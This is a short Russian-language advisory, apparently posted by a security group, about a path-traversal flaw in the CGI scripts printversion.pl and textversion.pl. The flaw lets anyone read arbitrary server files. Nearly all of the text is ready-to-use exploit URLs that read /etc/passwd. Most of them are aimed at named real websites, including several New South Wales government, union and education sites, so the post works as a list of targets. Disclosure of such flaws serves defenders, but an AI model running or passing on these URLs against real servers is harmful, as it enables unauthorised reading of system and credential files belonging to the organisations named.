Скрипты printversion.pl и textversion.pl позволяют читать произвольные файлы на сервере:

http://www.xxx.com/cgi-bin/textversion/textversion.pl? conf=conf.xml&file=../../../../etc/passwd 
http://www.xxx.com/cgi-bin/printversion/printversion.pl? conf=conf.xml&file=../../../etc/passwd 

Пример:

http://lcnsw.labor.net.au/cgi-bin/printversion/printversion.pl? conf=conf.xml&file=../../../etc/passwd 
http://www.racismnoway.com.au/cgi-bin/printversion/ printversion.pl?conf=conf.xml&file=../../../etc/passwd 
http://www.sca.nsw.gov.au/cgi-bin/printversion/printversion.pl? conf=conf.xml&file=../../../../etc/passwd 
http://www.sca.nsw.gov.au/cgi-bin/textversion/textversion.pl? conf=conf.xml&file=../../../../etc/passwd 
http://www.nswteachers.nsw.edu.au/cgi-bin/printversion/ printversion.pl?conf=conf.xml&file=./../../../etc/passwd 
http://www.communitybuilders.nswgov.au/cgi-bin/textversion/ textversion.pl?file=../../../../etc/passwd 
http://unionsafe.labor.netau/cgi-bin/textversion/textversion.pl? conf=conf.xml&file=../../../../etc/passwd 

durito [durito@mail.ru] LwB Security Team [lwb57.org] 
Copyright 2002-2005 by LwB Security Team. All rights reserved.



Оставить мнение